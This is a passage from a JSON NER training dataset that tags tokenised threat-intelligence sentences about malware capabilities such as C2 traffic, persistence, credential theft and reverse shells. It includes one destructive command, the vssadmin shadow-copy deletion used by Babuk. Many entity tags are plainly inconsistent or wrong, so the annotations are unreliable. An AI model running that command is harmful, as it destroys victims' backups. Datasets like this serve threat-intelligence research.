"I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "encodes", "C2", "traffic", "with", "base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "encrypts", "C2", "data", "with", "a", "ROR", "by", "3", "and", "an", "XOR", "by", "0x23." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "establishes", "a", "backdoor", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BADNEWS", "is", "capable", "of", "executing", "commands", "via", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "decrypt", "AES", "encrypted", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Tool", "O", "O" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "download", "files", "from", "C2", "to", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "use", "the", "<code>CreatePipe</code>", "API", "to", "add", "a", "sub-process", "for", "execution", "via", "cmd." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "inject", "shellcode", "into", "svchost.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "BBK", "can", "extract", "a", "malicious", "Portable", "Executable", "(PE)", "from", "a", "photo." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "use", "HTTP", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BBK", "has", "the", "ability", "to", "use", "cmd", "to", "run", "a", "Portable", "Executable", "(PE)", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "can", "compress", "data", "with", "ZLIB", "prior", "to", "sending", "it", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "has", "been", "seen", "persisting", "via", "COM", "hijacking", "through", "replacement", "of", "the", "COM", "object", "for", "MruPidlList", "<code>{42aedc87-2188-41fd-b9a3-0c966feabec1}</code>", "or", "Microsoft", "WBEM", "New", "Event", "Subsystem", "<code>{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}</code>", "depending", "on", "the", "system's", "CPU", "architecture." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "B-SecTeam", "O", "B-SecTeam", "B-SecTeam", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DLL", "side-loading", "has", "been", "used", "to", "execute", "BBSRAT", "through", "a", "legitimate", "Citrix", "executable,", "ssonsvr.exe.", "The", "Citrix", "executable", "was", "dropped", "along", "with", "BBSRAT", "by", "the", "dropper." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "BBSRAT", "uses", "Expand", "to", "decompress", "a", "CAB", "file", "into", "executable", "content." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "can", "delete", "files", "and", "directories." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BBSRAT", "can", "list", "file", "and", "directory", "information." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "can", "list", "running", "processes." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "BBSRAT", "has", "been", "seen", "loaded", "into", "msiexec.exe", "through", "process", "hollowing", "to", "hide", "its", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "has", "been", "loaded", "through", "DLL", "side-loading", "of", "a", "legitimate", "Citrix", "executable", "that", "is", "set", "to", "persist", "through", "the", "Registry", "Run", "key", "location", "<code>HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ssonsvr.exe</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "can", "start,", "stop,", "or", "delete", "services." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Features", "O", "B-Features", "O" ] }, { "tokens": [ "BBSRAT", "uses", "a", "custom", "encryption", "algorithm", "on", "data", "sent", "back", "to", "the", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BBSRAT", "can", "query", "service", "configuration", "information." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "BBSRAT", "uses", "GET", "and", "POST", "requests", "over", "HTTP", "or", "HTTPS", "for", "command", "and", "control", "to", "obtain", "commands", "and", "send", "ZLIB", "compressed", "data", "back", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BBSRAT", "can", "modify", "service", "configurations." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "BISCUIT", "uses", "SSL", "for", "encrypting", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "malware", "contains", "a", "secondary", "fallback", "command", "and", "control", "server", "that", "is", "contacted", "after", "the", "primary", "command", "and", "control", "server." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "download", "a", "file", "from", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "can", "capture", "keystrokes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "enumerate", "running", "processes", "and", "identify", "their", "owners." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "periodically", "take", "screenshots", "of", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "collect", "the", "processor", "type,", "operation", "system,", "computer", "name,", "and", "whether", "the", "system", "is", "a", "laptop", "or", "PC." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "gather", "the", "username", "from", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "collect", "the", "system", "`UPTIME`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BISCUIT", "has", "a", "command", "to", "launch", "a", "command", "shell", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITSAdmin", "can", "be", "used", "to", "create", "BITS", "Jobs", "to", "launch", "a", "malicious", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BITSAdmin", "can", "be", "used", "to", "create", "BITS", "Jobs", "to", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BITSAdmin", "can", "be", "used", "to", "create", "BITS", "Jobs", "to", "upload", "and/or", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "BITSAdmin", "can", "be", "used", "to", "create", "BITS", "Jobs", "to", "upload", "and/or", "download", "files", "from", "SMB", "file", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "BLACKCOFFEE", "has", "also", "obfuscated", "its", "C2", "traffic", "as", "normal", "traffic", "to", "sites", "such", "as", "Github." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLACKCOFFEE", "uses", "Microsoft’s", "TechNet", "Web", "portal", "to", "obtain", "a", "dead", "drop", "resolver", "containing", "an", "encoded", "tag", "with", "the", "IP", "address", "of", "a", "command", "and", "control", "server." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLACKCOFFEE", "has", "the", "capability", "to", "delete", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "BLACKCOFFEE", "has", "the", "capability", "to", "enumerate", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "BLACKCOFFEE", "uses", "Microsoft’s", "TechNet", "Web", "portal", "to", "obtain", "an", "encoded", "tag", "containing", "the", "IP", "address", "of", "a", "command", "and", "control", "server", "and", "then", "communicates", "separately", "with", "that", "IP", "address", "for", "C2.", "If", "the", "C2", "server", "is", "discovered", "or", "shut", "down,", "the", "threat", "actors", "can", "update", "the", "encoded", "IP", "address", "on", "TechNet", "to", "maintain", "control", "of", "the", "victims’", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "BLACKCOFFEE", "has", "the", "capability", "to", "discover", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "BLACKCOFFEE", "has", "the", "capability", "to", "create", "a", "reverse", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "been", "signed", "with", "code-signing", "certificates", "such", "as", "CodeRipper." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BLINDINGCAN", "has", "uploaded", "files", "from", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "used", "AES", "and", "XOR", "to", "decrypt", "its", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "obfuscated", "code", "using", "Base64", "encoding." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "sent", "user", "and", "system", "information", "to", "a", "C2", "server", "via", "HTTP", "POST", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "deleted", "itself", "and", "associated", "artifacts", "from", "victim", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "can", "search,", "read,", "write,", "move,", "and", "execute", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "B-Features", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "downloaded", "files", "to", "a", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "lured", "victims", "into", "executing", "malicious", "macros", "embedded", "within", "Microsoft", "Office", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "attempted", "to", "hide", "its", "payload", "by", "using", "legitimate", "file", "names", "such", "as", "\"iconcache.db\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BLINDINGCAN", "has", "used", "Rundll32", "to", "load", "a", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "loaded", "and", "executed", "DLLs", "in", "memory", "during", "runtime", "on", "a", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "been", "packed", "with", "the", "UPX", "packer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BLINDINGCAN", "has", "been", "delivered", "by", "phishing", "emails", "containing", "malicious", "Microsoft", "Office", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "encoded", "its", "C2", "traffic", "with", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "encrypted", "its", "C2", "traffic", "with", "RC4." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "collected", "from", "a", "victim", "machine", "the", "system", "name,", "processor", "information,", "OS", "version,", "and", "disk", "information,", "including", "type", "and", "free", "space", "available." ], "ner_tags": [ "B-Way", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "collected", "the", "victim", "machine's", "local", "IP", "address", "information", "and", "MAC", "address." ], "ner_tags": [ "B-Way", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "modified", "file", "and", "directory", "timestamps." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "used", "HTTPS", "over", "port", "443", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLINDINGCAN", "has", "executed", "commands", "via", "cmd.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BLUELIGHT", "can", "zip", "files", "before", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "has", "encoded", "data", "into", "a", "binary", "blob", "using", "XOR." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Way", "O", "O", "B-Way" ] }, { "tokens": [ "BLUELIGHT", "can", "use", "different", "cloud", "providers", "for", "its", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Area", "I-Org", "I-Org", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "passwords", "stored", "in", "web", "browers,", "including", "Internet", "Explorer,", "Edge,", "Chrome,", "and", "Naver", "Whale." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "B-Way", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "BLUELIGHT", "has", "a", "XOR-encoded", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "has", "exfiltrated", "data", "over", "its", "C2", "channel." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "uninstall", "itself." ], "ner_tags": [ "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "enumerate", "files", "and", "collect", "associated", "metadata." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "BLUELIGHT", "can", "download", "additional", "files", "onto", "the", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "process", "filenames", "and", "SID", "authority", "level." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "B-HackOrg", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "BLUELIGHT", "has", "captured", "a", "screenshot", "of", "the", "display", "every", "30", "seconds", "for", "the", "first", "5", "minutes", "after", "initiating", "a", "C2", "loop,", "and", "then", "once", "every", "five", "minutes", "thereafter." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "a", "list", "of", "anti-virus", "products", "installed", "on", "a", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "harvest", "cookies", "from", "Internet", "Explorer,", "Edge,", "Chrome,", "and", "Naver", "Whale", "browsers." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "check", "to", "see", "if", "the", "infected", "machine", "has", "VM", "tools", "running." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "has", "collected", "the", "computer", "name", "and", "OS", "version", "from", "victim", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "IP", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "the", "username", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "collect", "the", "local", "time", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BLUELIGHT", "can", "use", "HTTP/S", "for", "C2", "using", "the", "Microsoft", "Graph", "API." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "can", "use", "DNS", "and", "TXT", "records", "within", "its", "DNS", "tunneling", "protocol", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "uses", "a", "DGA", "to", "communicate", "with", "command", "and", "control", "servers." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "uses", "<code>-windowstyle", "hidden</code>", "to", "conceal", "a", "PowerShell", "window", "that", "downloads", "a", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "can", "download", "or", "upload", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "is", "written", "in", "PowerShell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "persists", "using", "a", "scheduled", "task", "that", "executes", "every", "minute." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BONDUPDATER", "can", "read", "batch", "commands", "in", "a", "file", "sent", "from", "its", "C2", "server", "and", "execute", "them", "with", "cmd.exe." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BOOSTWRITE", "has", "been", "signed", "by", "a", "valid", "CA." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BOOSTWRITE", "has", "exploited", "the", "loading", "of", "the", "legitimate", "Dwrite.dll", "file", "by", "actually", "loading", "the", "gdi", "library,", "which", "then", "loads", "the", "gdiplus", "library", "and", "ultimately", "loads", "the", "local", "Dwrite", "dll." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "BOOSTWRITE", "has", "used", "a", "a", "32-byte", "long", "multi-XOR", "key", "to", "decode", "data", "inside", "its", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BOOSTWRITE", "has", "encoded", "its", "payloads", "using", "a", "ChaCha", "stream", "cipher", "with", "a", "256-bit", "key", "and", "64-bit", "Initialization", "vector", "(IV)", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BOOSTWRITE", "has", "used", "the", "DWriteCreateFactory()", "function", "to", "load", "additional", "modules." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BOOTRASH", "is", "a", "Volume", "Boot", "Record", "(VBR)", "bootkit", "that", "uses", "the", "VBR", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BOOTRASH", "has", "used", "unallocated", "disk", "space", "between", "partitions", "for", "a", "hidden", "file", "system", "that", "stores", "components", "of", "the", "Nemesis", "bootkit." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam" ] }, { "tokens": [ "BS2005", "uses", "Base64", "encoding", "for", "communication", "in", "the", "message", "body", "of", "an", "HTTP", "request." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUBBLEWRAP", "can", "communicate", "using", "SOCKS." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BUBBLEWRAP", "collects", "system", "information,", "including", "the", "operating", "system", "version", "and", "hostname." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUBBLEWRAP", "can", "communicate", "using", "HTTP", "or", "HTTPS." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "BUSHWALK", "can", "embed", "into", "the", "legitimate", "`querymanifest.cgi`", "file", "on", "compromised", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUSHWALK", "can", "Base64", "decode", "and", "RC4", "decrypt", "malicious", "payloads", "sent", "through", "a", "web", "request’s", "command", "parameter." ], "ner_tags": [ "B-SamFile", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUSHWALK", "can", "write", "malicious", "payloads", "sent", "through", "a", "web", "request’s", "command", "parameter." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUSHWALK", "can", "encrypt", "the", "resulting", "data", "generated", "from", "C2", "commands", "with", "RC4." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUSHWALK", "can", "modify", "the", "`DSUserAgentCap.pm`", "Perl", "module", "on", "Ivanti", "Connect", "Secure", "VPNs", "and", "either", "activate", "or", "deactivate", "depending", "on", "the", "value", "of", "the", "user", "agent", "in", "incoming", "HTTP", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BUSHWALK", "is", "a", "web", "shell", "that", "has", "the", "ability", "to", "execute", "arbitrary", "commands", "or", "write", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "Babuk", "can", "use", "ChaCha8", "and", "ECDH", "to", "encrypt", "data." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "unpack", "itself", "into", "memory", "using", "XOR." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "Babuk", "can", "stop", "anti-virus", "services", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "enumerate", "files", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "delete", "shadow", "volumes", "using", "<code>vssadmin.exe", "delete", "shadows", "/all", "/quiet</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "can", "use", "multiple", "Windows", "API", "calls", "for", "actions", "on", "compromised", "hosts", "including", "discovery", "and", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "enumerate", "network", "shares." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "has", "the", "ability", "to", "check", "running", "processes", "on", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Babuk", "can", "stop", "specific", "services", "related", "to", "backups." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Versions", "of", "Babuk", "have", "been", "packed." ], "ner_tags": [ "O", "O", 